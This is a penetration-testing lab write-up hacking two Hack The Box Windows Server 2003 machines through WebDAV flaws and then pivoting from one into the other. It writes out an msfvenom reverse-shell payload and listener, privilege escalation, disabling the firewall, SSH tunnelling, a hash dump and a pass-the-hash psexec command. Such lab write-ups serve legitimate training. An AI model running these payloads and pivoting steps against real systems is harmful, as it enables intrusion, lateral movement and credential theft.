Epic pivoting. Polishing traffic routing skills on HackTheBox virtual machines

A good knowledge of pivoting (a technique used to route traffic to the victim and back through interim hosts) is essential for any ethical hacker. Furthermore, this skill is absolutely mandatory for corporate network pentesting. In this article, I am going two hack two simple virtual machines on Hack The Box and demonstrate how to route traffic in the course of pentesting.

In its early days, HackTheBox (HTB) training ground for white hat hackers had two medium-level virtual machines available for hacking: Grandpa (IP: and Granny (IP: Both machines had WebDAV-related vulnerabilities, and the strategies used to capture their root flags were nearly identical. (If you have forgotten, WebDAV (Web Distributed Authoring and Versioning) is a set of HTTP extensions allowing clients to perform remote Web content authoring operations.)

Today, I will demonstrate how to hack each of these hosts separately. Then, I am going to transform one of them into a foothold and use it to attack the second machine.


Granny VM is the first target. Its rating is “easy” (3.4 points out of 10). In my opinion, it closely resembles real-life cases (i.e. systems using outdated software). Such machines are often used at OSCP certification exams in the ‘light’ category.

Hack The Box - Granny

Hack The Box – Granny

Information collection

First, I scan the ports and examine the identified services.


I perform an Nmap scanning in two stages: (1) surface scanning (SYN packets only, no scripts); and (2) precise scanning of the identified ports (involves the NSE script engine and identification of service versions).

root@kali:~# nmap -n -Pn -oA nmap/granny-initial
root@kali:~# cat nmap/granny-initial.nmap
Host is up (0.065s latency).
Not shown: 999 filtered ports
80/tcp open http

TCP 80 (HTTP) appears to be the only open port. Let’s check who lives there.

root@kali:~# nmap -n -Pn -sV -sC -oA nmap/granny-version -p80
root@kali:~# cat nmap/granny-version.nmap
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| WebDAV type: Unknown
| Server Date: Sat, 21 Dec 2019 18:04:11 GMT
|_ Server Type: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

So, this is a Microsoft IIS web server, v.6.0. Google claims that this is Windows Server 2003.

Checking the Windows version on the basis of the IIS web server version

Checking the Windows version on the basis of the IIS web server version

No information on the Windows architecture is available, so let’s assume this is an x86-based PC: that architecture was the most common during the respective period. I launch the http-webdav-scan.nse script, and it reports that WebDAV HTTP extensions are installed on Granny. Accordingly, I have no choice but to examine the web.


Let’s research the port 80 from various angles using both a simple browser and special WebDAV utilities.

General information

The main page of the web server ( looks as follows.

Since the browser does not provide much information, let’s check HTTP headers.

root@kali:~# curl -I
HTTP/1.1 200 OK
Content-Length: 1433
Content-Type: text/html
Last-Modified: Fri, 21 Feb 2003 15:48:30 GMT
Accept-Ranges: bytes
ETag: "05b3daec0d9c21:348"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 21 Dec 2019 21:51:01 GMT

As expected, the headers contain information about ASP.NET. When it comes to web service stacks, it is necessary to keep in mind two basic schemes:

  • LAMP = Linux + Apache + MySQL + PHP
  • WISA = Windows + IIS + SQL Server + ASP.NET

In this particular case, the target system runs Windows, and the ASP.NET platform is used as an alternative to PHP. Accordingly, the payload for my backdoor will be created in ASP.NET. In addition, I have to find a way to deliver a bunch of asp/aspx files to the server.


WebDAV extensions add new HTTP verbs and headers allowed for request methods. One of these methods, MOVE, makes it possible to move or rename files on the server. My malicious plan is simple: upload a legitimate file to the server and rename it into an executable one by changing the extension to asp or aspx. This allows me to circumvent the blacklist of file types whose upload is prohibited. The trick is as old as the hills and based on a well-known vulnerability of web servers, OSVDB-397, allowing remote attackers to use PUT.


I used the OSVDB (Open Source Vulnerability Database) notation to characterize the vulnerability. However, in April 2016, this database was shut down. Therefore, I had to refer to the Vulners aggregator that contains inter alia the OSVDB. Without exaggeration, Vulners is a true ‘Google’ for hackers.

I am going to use a few handy command line tools to interact with WebDAV.

First, let’s check the security status with davtest. Too bad, this utility does not allow specifying the proxy server in order to see the sent requests. Therefore, I’ll use a trick: launch the Burp Suite, open the Proxy → Options tab, and add one more listener,, to the loopback interface.

Adding a new listener in Burp Suite

Adding a new listener in Burp Suite

Now I can unleash davtest on localhost (like I had earlier done with, and all requests will be redirected through the Burp proxy.

root@kali:~# davtest -rand evilhacker -url localhost
Testing DAV connection
OPEN SUCCEED: localhost
NOTE Random string for this session: evilhacker
Creating directory
Sending test files
PUT jhtml FAIL
PUT shtml FAIL


According to davtest, all attempts to upload a file to the server have failed; however, let’s open the Burp history and see what has really happened.

History of HTTP requests in Burp Suite

History of HTTP requests in Burp Suite

As you can see on the screenshot, the web server responded differently to different PUT requests.

  • Attempt to upload a file with the aspx extension: Access Forbidden (403)
  • Attempts to upload files with extensions asp, cgi, and shtml: Server Not Found (404; honestly, I have no idea why has IIS chosen this error); and
  • Attempts to upload other file types: Conflict (409).

The last error attracted my attention because it doesn’t frequently occur and often indicates a conflict between the version of the uploaded file and the version of the file present on the server.

This error should not be here, so I had a closer look at the body of the request to upload a simple text file.

PUT /localhost/davtest_evilhacker.txt HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: close
Host: localhost:80
User-Agent: DAV.pm/v0.49
Content-Length: 19

TXT put via davtest

So, the problem is that davtest had tried to upload these files to the nonexistent folder /localhost. Upon reviewing the HTTP history again, I found a MKCOL request: it was sent to create this directory and failed with the error 409. The request looks as follows:

MKCOL /localhost/DavTestDir_evilhacker/ HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: close
Host: localhost:80
User-Agent: DAV.pm/v0.49
Content-Length: 0

Apparently, the problem was caused by an attempt to create the subfolder /DavTestDir_evilhacker inside the nonexistent directory /localhost. I don’t know whether WebDAV can do such things or not; so, I manually created the single level directory /localhost in Burp Suite, and everything went fine.

Creating the /localhost directory in Burp Suite

Creating the /localhost directory in Burp Suite

Uploading a text file to the /localhost directory in Burp Suite

Uploading a text file to the /localhost directory in Burp Suite

The text file has been successfully uploaded. So, my plan is still in effect, and I can start generating the payload.


There are several possible payload types; everything depends on the purpose of your hacking attack.

  • If you know the location of the resource you need, and basic privileges are sufficient to access this resource, you may use a simple webshell controlled directly from the browser.
  • If you have to explore the host first, then you may use the same webshell combined with a PowerShell payload. Together, they give you a reverse shell.
  • If your goal is the full control over the machine, including privilege escalation to the admin’s level, then Meterpreter is your choice.

Of course, I select the last variant.

Payload generation

Using msfvenom, I create a backdoor for 32-bit Windows in the aspx format; its payload is Meterpreter.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform win LHOST= LPORT=31337 -f aspx > meterpreter/m.aspx

To avoid entering commands in the MSF console manually every time, I create a script launching a Metasploit listener automatically.

## meterpreter/l.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 31337
set ExitOnSession false
exploit -j -z


Kali includes a tool with a horrific name: cadaver. This is a console WebDAV client simplifying the command-line communication with WebDAV.

I am going to copy the backdoor generated in msfvenom into the text file m.txt, upload it to the server, and rename into m.aspx in the course of an interactive cadaver session.

root@kali:~# cp meterpreter/m.aspx m.txt
root@kali:~# cadaver
dav:/> put m.txt
dav:/> move m.txt m.aspx

Uploading and moving the backdoor with cadaver

Uploading and moving the backdoor with cadaver

Now I can launch the Metasploit listener and execute the file m.aspx on the server by simply addressing it in the browser.

root@kali:~# msfconsole -qr meterpreter/l.rc

Launching the Metasploit listener and opening a Meterpreter session

Launching the Metasploit listener and opening a Meterpreter session

So, I have got a Meterpreter session on behalf of NT AUTHORITY\NETWORK SERVICE.


For your information: all the above steps could be made in one click: the exploit/windows/iis/iis_webdav_upload_asp module for Metasploit automates the process.

Shell on behalf of NT AUTHORITY\SYSTEM

The rest is paperwork. I launch the local exploit suggester and pick any available exploit. The virtual machine is old, and the choice of bugs to exploit is extensive.

Looking for available local exploits (VM Granny)

Looking for available local exploits (VM Granny)

After one minute of waiting, 29 vulnerabilities have been checked, and seven of them were likely suitable for my purposes.

Privilege escalation using the MS14-070 vulnerability (VM Granny)

Privilege escalation using the MS14-070 vulnerability (VM Granny)

I picked MS14-070, a Windows TCP/IP stack vulnerability. The privilege escalation with Metasploit took just a few seconds, and I got a privileged shell.


The magic of Metasploit is truly impressive; however, its deceptive simplicity conceals nontrivial manipulations with WinAPI. For instance, users of Hack The Box forum often practice their privilege escalation skills without Meterpreter.

If I spawn the shell and ask whoami, the server will respond that my privileges still don’t exceed the NETWORK SERVICE level. This is because the payload (i.e. Meterpreter) is still injected into the first process that I has hijacked prior to the privilege escalation. To get the SYSTEM rights in the cmd shell, I have to migrate the malicious process to a process with respective privileges.

Who am I?

Who am I?

I picked cidaemon.exe (PID 3964) as a carrier and migrated to it.

Migration to the process cidaemon.exe (3964)

Migration to the process cidaemon.exe (3964)

Now my rights are displayed correctly.

I will ask again: Who am I?

I will ask again: Who am I?

The only remaining task is to find and retrieve the user and administrator hashes (flags). I will do this using two Meterpreter modules: search and download.

Capturing the flags (VM Granny)

Capturing the flags (VM Granny)

Finally, let’s check the OS bitness.

meterpreter > sysinfo
Computer : GRANNY
OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows

Based on sysinfo, this is a 32-bit Windows version indeed.

Voila! Granny virtual machine is hacked.



Now it is time to hack Grandpa.


I will deal with this machine (difficulty: 4.5 points out of the 10) faster and won’t describe my every step in so much detail.

Hack The Box - Grandpa

Hack The Box – Grandpa

Information collection


As usual, I start with a two-phase Nmap scan.

root@kali:~# nmap -n -Pn -oA nmap/grandpa-initial
root@kali:~# cat nmap/grandpa-initial.nmap
Host is up (0.064s latency).
Not shown: 999 filtered ports
80/tcp open http

The scan results are identical.

root@kali:~# nmap -n -Pn -sV -sC -oA nmap/grandpa-version -p80
root@kali:~# cat nmap/grandpa-version.nmap
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
| Server Date: Sat, 21 Dec 2019 16:49:20 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


The main page shows the same picture.


Perhaps, the only real difference between the two machines is in their WebDAV vulnerabilities. On Grandpa, the restriction prohibiting uploads using the PUT method applies to all file types. However, keeping in mind the IIS version, I decided to use a well-known exploit for the CVE-2017-7269 vulnerability. This exploit is based on an error in the ScStoragePathFromUrl function of the WebDAV service: this function contains a buffer overflow vulnerability in the string of one of the headers in a PROPFIND request.

The original Proof of Concept is available on GitHub; but I used a built-in Metasploit module: iis_webdav_scstoragepathfromurl.

Exploiting the buffer overflow vulnerability in ScStoragePathFromUrl with Metasploit

Exploiting the buffer overflow vulnerability in ScStoragePathFromUrl with Metasploit

After opening a Meterpreter session, you may encounter a permission error. The reason behind this bug is similar to the one observed in the case of Granny: the payload is locked in the process it was injected into, and this process lacks the required permissions.

To fix this, I call the Process List and migrate to a process with required privileges.

Migrating to w3wp.exe (2408)

Migrating to w3wp.exe (2408)

By the way, to find out what process was originally used to inject the payload, you may use the netstat command (prior to the migration) and check the list of active network connections.

C:\windows\system32\inetsrv>netstat -vb

Identifying the current Meterpreter process

Identifying the current Meterpreter process

Privilege escalation

Just like on the previous machine, I will use the same exploit to escalate my privileges.

Looking for available local exploits (VM Grandpa)

Looking for available local exploits (VM Grandpa)

To be on the safe side, I search for local exploits, and their list is the same as on Granny.

Privilege escalation using the MS14-070 vulnerability (VM Grandpa)

Privilege escalation using the MS14-070 vulnerability (VM Grandpa)

I select ms14_070_tcpip_ioctl, escalate my privileges, and get a session.

Capturing the flags (VM Grandpa)

Capturing the flags (VM Grandpa)

Grandpa is hacked!




Now it is time to implement the main objective set in the beginning of this article! I will demonstrate some basic pivoting principles using Metasploit.

This is what we have:

  1. The attacker’s local virtual machine with Kali Linux (IP: that has a direct access to VM Granny (IP:
  2. VM Granny that has a direct access to VM Grandpa (IP:
  3. The attacker doesn’t have a direct access to VM Grandpa: the incoming and outgoing connections are blocked with iptables.

The goals:

  1. Establish a connection between the attacker’s VM and VM Grandpa for third-party utilities (out of the Metasploit session context).
  2. Establish a connection between the attacker’s VM and VM Grandpa in the Metasploit session context and gain the maximum privileges on the Grandpa host.



I am going to use a standard Linux firewall, iptables, to exclude direct interactions between my host and Grandpa. This will ensure that the rules of the game are observed.

root@kali:~# iptables -A OUTPUT -d -j DROP
root@kali:~# iptables -A INPUT -s -j DROP

Blocking outgoing connections to VM Grandpa

Blocking outgoing connections to VM Grandpa

The connection to a segment of the virtual Hack The Box network hidden behind the VPN can be illustrated by the following scheme.

Connection to the Hack The Box laboratory: a logical scheme

Connection to the Hack The Box laboratory: a logical scheme

However, for clarity purposes, I would present the interaction scheme “Attacker – Pivot – Grandpa” as follows:

Interaction between the subjects implemented through the Pivoting scheme

Interaction between the subjects implemented through the Pivoting scheme

The attacker (VM Kali) is on the left, VM Granny is in the middle, while the victim (VM Grandpa) is on the right. The direct communication between the attacker and the victim is impossible. The only communication path is via an interim host.


In my attack, the interim host (i.e. Granny) will be used as a foothold to handle the traffic to Grandpa and back. First, I have to get access to the foothold as described above.

To save time and effort, I wrote an auto execution script for Metasploit: if something goes wrong and the entire construction has to be rebuilt, I won’t have to enter all commands manually.

## pivot.rc

use auxiliary/server/socks4a
set SRVPORT 9050
run -j

use exploit/windows/iis/iis_webdav_upload_asp
set LHOST tun0
set InitialAutoRunScript migrate -f
exploit -j


The first block launches a proxy server on the local port 9050, while the second one uses the iis_webdav_upload_asp module to start a low-privileged Meterpreter session and immediately migrate to another process to avoid an invalid or missing token authorization error (i.e. an access rights error).

root@kali:~# msfconsole -qr pivot.rc

Opening a Meterpreter session on the foothold (hacking VM Granny)

Opening a Meterpreter session on the foothold (hacking VM Granny)

Then I enter the command route add to add a routing rule for the opened Meterpreter session (Session 1).

msf5 > route add 1
[*] Route added

I set the subnetwork mask after the slash (in the CIDR notation) to associate with this rule only one host – Grandpa (

The preliminary settings are configured; to check whether everything is OK, you can use the jobs and route commands.

msf5 > jobs
msf5 > route

Running background processes and active routing rules

Running background processes and active routing rules

The first command displays all processes running in the background of Metasploit (for instance, I can see my SOCKS server), while the second one displays the list of active routing rules.

Metasploit SOCKS server

The ports can be scanned using Metasploit tools (including routing settings configured in Metasploit). However, in many cases, the analysis of the target PC involves third-party utilities. The SOCKS server that I have just configured and launched will be of great assistance in this: the proxychains tool allows running such utilities through this server.

Zombie proxy

Metasploit supports SOCKS5; however, as it always happens with new features, version 5 is marred by numerous bugs. In my opinion, this is not a tragedy because version 4a supports nearly the same list of features (except for the authentication support) and can resolve DNS names into an IP address. Combined with the route module, this allows to use the compromised host as a proxy for your browser; i.e. browse the Internet on behalf of the victim.

I am going to install proxychains-ng (version 4, the most stable one) and launch an Nmap scan through the SOCKS proxy.

root@kali:~# apt install proxychains4
root@kali:~# proxychains4 nmap -n -v -Pn -sT -p80

Scanning VM Grandpa through the SOCKS proxy

Scanning VM Grandpa through the SOCKS proxy

As you can see, port 80 on the Grandpa host is open.

Unfortunately, the Nmap capacity is severely limited when it’s used with proxychains (no stealth SYN scanning because proxychains does not support raw packets, no service version identification, low speed, etc.). However, this is just an example, and you can use plenty of other utilities.

The proxychains-ng settings are stored in the file /etc/proxychains4.conf. Here you can change the number of the port used by the proxy (I used the default 9050 port).

At this stage, a SOCKS server and Metasploit routes can be added to the above-mentioned interaction scheme.

The SOCKS server and Metasploit routes are added to the scheme

The SOCKS server and Metasploit routes are added to the scheme

Reverse SSH tunnel

To communicate with Grandpa in the framework of a Metasploit session, I have to set up the routing back to my host through the foothold.

Because I deliberately drop the traffic between my host and Grandpa, Grandpa cannot talk to me, while I cannot respond. Accordingly, I have to build this section of the communication bridge manually. I am going to create an SSH tunnel between the foothold and the attacking machine.

One might ask: “Why don’t you use bind_tcp instead of the default reverse_tcp? Why spend time and effort on SSH?” Yes, it could be done this way; however, reverse connections are always preferable: they are more secure (anybody can connect to a bind shell), while the primary purpose of firewalls is to block suspicious incoming connections.

Reverse port forwarding

In the latest version of Metasploit, the portfwd module (included in Meterpreter) supports a new option: -R. In theory, it allows to configure the reverse port forwarding from the victim to the hacker’s machine. I tried to use this method to receive data from Granny, but I failed: portfwd refused to create a relay precisely because of the above-mentioned -R flag.

If VM Granny had PowerShell installed, the best solution would be to launch an SSH server and connect to the SSH using the Kali client with the -R (SSH Reverse Tunneling) option. Unfortunately, PowerShell is not installed on the interim host; as a result, I have no choice but to use the attacker’s machine as the server.

Disabling firewall

To create an SSH tunnel from Granny to Kali, I have to disable the firewall on the Windows Server first. This requires the admin privileges; so, I exploit the MS14-070 vulnerability again.

Escalating the rights to the maximum on the foothold

Escalating the rights to the maximum on the foothold

Now I can spawn the shell and do whatever I want.

C:\WINDOWS\system32>netsh firewall set opmode disable
netsh firewall set opmode disable

PuTTY in your terminal

I will create a tunnel using Plink, a command line connection tool similar to PuTTY. It can be either downloaded or found in Kali in the Windows binaries section.

root@kali:~# locate plink.exe

I am going to drop Plink into the Windows Server using Meterpreter. The directory I have chosen is a priori available for file recording: C:\Inetpub\wwwroot.

meterpreter > upload plink.exe “c:\inetpub\wwwroot”
[*] uploading : plink.exe -> c:\inetpub\wwwroot
[*] uploaded : plink.exe -> c:\inetpub\wwwroot\plink.exe

Then I create a supplementary user, snovvcrash, on my machine (to avoid creating a tunnel on behalf of the root), set a password (qwe123), and launch an SSH server.

root@kali:~# useradd snovvcrash
root@kali:~# passwd snovvcrash
New password: qwe123
Retype new password: qwe123
passwd: password updated successfully
root@kali:~# service ssh start

In addition, I am going to block this user from executing commands by changing the default shell to /bin/false in /etc/passwd. It won’t execute any commands in any case, while the system security will raise significantly after this step.

Editing the login shell for snovvcrash

Editing the login shell for snovvcrash

Everything is ready, and I can create an SSH tunnel. To do so, I enter the following command in the Windows command line:

C:\Inetpub\wwwroot>plink.exe -l snovvcrash -pw qwe123 -L -N

Creating an SSH tunnel from VM Granny to Kali

Creating an SSH tunnel from VM Granny to Kali

This command means approximately the following: “Dear Granny, please forward everything that comes to the port 8888 of the interface at the address through the SSH tunnel”. I use the nc command to check whether everything is working fine.

Checking whether the newly-created tunnel is operating

Checking whether the newly-created tunnel is operating

Important: the tunnel was created from the Granny host using the -L option; therefore, on the Granny’s side, it is a ‘direct’ tunnel to the attacker’s machine. By contrast, on the Kali side, this tunnel is a ‘reverse’ one.

Now the attack scheme looks as follows:

The SSH tunnel appeared on the interaction scheme

The SSH tunnel appeared on the interaction scheme

Hack Grandpa!

Now I am ready to compromise Grandpa for the second time.

I will use the exploit iis_webdav_scstoragepathfromurl again, but this time, its setup is slightly different: the Granny host ( will play the role of the attacker (LHOST), while the port 8888 will be used to bind the handler (in other words, it will be used as the LPORT forwarding the data to Kali through the SSH tunnel).

Hacking VM Grandpa via VM Granny using iis_webdav_scstoragepathfromurl

Hacking VM Grandpa via VM Granny using iis_webdav_scstoragepathfromurl

After the exploitation, I escalate my privileges using the tried-and-true MS14-070 vulnerability.

Privilege escalation on VM Grandpa

Privilege escalation on VM Grandpa

I open a Meterpreter session and review the system information.

meterpreter > sysinfo
Computer : GRANPA
OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows

I seized full control over Grandpa without exchanging a single bit with it. Mission accomplished!

Port forwarding to a local service

In the end, I am going to demonstrate one last example of traffic forwarding.

The Grandpa’s firewall is still on; so, I cannot simply get access to its SMB resources from the outside (as you remember, the Nmap scan hasn’t shown the port 445 among the open ones). However, I can perform a trick: forward my local port 445 from Kali to Grandpa with Meterpreter, thus, gaining control over the SMB service running on Grandpa.

meterpreter > portfwd add -l 445 -p 445 -r
[*] Local TCP relay created: :445 ↔

This command means that the local port 445 (flag -l) of the attacker’s machine must be associated with the open Meterpreter session, while everything coming to it must be forwarded to the remote port 445 (flag -p) of the victim’s machine (flag -r) via the interface (because the SMB is available locally on the Windows Server). I launch Nmap again, scan the port 445 of the local host – and voila! It’s open!

Scanning the port 445 forwarded from Grandpa

Scanning the port 445 forwarded from Grandpa

In other words, on top of the route created in Metasploit, I have forwarded the port 445 from the attacker’s machine to the port 445 on VM Grandpa (earlier, this port was available only on the loopback interface due to the firewall rules). Therefore, the final version of the interaction scheme looks as follows:

Port 445 is forwarded from the attacker's machine to VM Grandpa

Port 445 is forwarded from the attacker’s machine to VM Grandpa


Because this is a Windows Server 2003, it won’t be difficult for you to crack an SMB share because it uses LM hashes to store passwords. Although extracting them is not a big deal, I will use an even easier method.

Capturing password hash dumps on VM Grandpa

Capturing password hash dumps on VM Grandpa

Using hashdump, I can dump the hash pair LMHASH:NTHASH from the SAM database and perform a Pass-the-Hash attack using the psexec.py utility included in the Impacket toolkit.

root@kali:~# ./psexec.py -hashes ‘0a70918d669baeb307012642393148ab:34dec8a1db14cdde2a21967c3c997548’ Administrator@
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share C$
[*] Uploading file NNDHtRms.exe
[*] Opening SVCManager on
[*] Creating service tWni on
[*] Starting service tWni.....
[!] Press help for extra shell commands
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

nt authority\system

That’s all for today.

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